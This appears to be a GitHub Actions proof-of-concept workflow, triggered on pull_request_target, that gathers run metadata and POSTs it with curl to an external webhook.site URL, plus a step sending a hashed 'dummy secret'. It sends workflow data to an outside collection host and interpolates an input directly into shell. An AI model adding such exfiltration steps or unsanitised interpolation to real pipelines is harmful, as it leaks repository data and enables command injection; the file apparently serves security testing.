# .github/workflows/poc.yml
name: SAFE PoC – Metadata & Dummy Secret Demo

on:
  pull_request_target:
    branches: [ main ]

  workflow_dispatch:
    inputs:
      TEST_SECRET:
        description: "Dummy secret for PoC (safe, not real)"
        required: false
        default: ""

permissions:
  contents: read

env:
  WEBHOOK_URL: "https://webhook.site/3fe8a22a-5982-47f3-9373-e439ba1b9832"

jobs:
  poc:
    runs-on: ubuntu-latest
    steps:
      - name: Checkout base repo only
        uses: actions/checkout@v4
        with:
          ref: ${{ github.event.pull_request.base.ref }}

      - name: Collect metadata
        run: |
          {
            echo "EVENT_TYPE=${{ github.event_name }}";
            echo "REPO=${{ github.repository }}";
            echo "RUN_ID=${{ github.run_id }}";
            echo "ACTOR=${{ github.actor }}";
            echo "TIMESTAMP=$(date -u +%FT%TZ)";
          } | tee poc-info.txt

      - name: Send metadata to webhook
        run: |
          jq -n \
            --arg event "${{ github.event_name }}" \
            --arg repo "${{ github.repository }}" \
            --arg run_id "${{ github.run_id }}" \
            --arg actor "${{ github.actor }}" \
            --arg ts "$(date -u +%FT%TZ)" \
            '{event:$event, repo:$repo, run_id:$run_id, actor:$actor, timestamp:$ts}' \
          | curl -sS -X POST -H "Content-Type: application/json" -d @- "$WEBHOOK_URL"

      - name: Handle dummy secret if provided
        if: ${{ github.event_name == 'workflow_dispatch' && inputs.TEST_SECRET != '' }}
        run: |
          D="${{ inputs.TEST_SECRET }}"
          LEN=${#D}
          SHA=$(printf '%s' "$D" | sha256sum | awk '{print $1}')
          jq -n \
            --arg repo "${{ github.repository }}" \
            --arg run_id "${{ github.run_id }}" \
            --arg len "$LEN" \
            --arg sha "$SHA" \
            --arg ts "$(date -u +%FT%TZ)" \
            '{repo:$repo, run_id:$run_id, dummy_secret_len:$len, dummy_secret_sha256:$sha, timestamp:$ts}' \
          | curl -sS -X POST -H "Content-Type: application/json" -d @- "$WEBHOOK_URL"
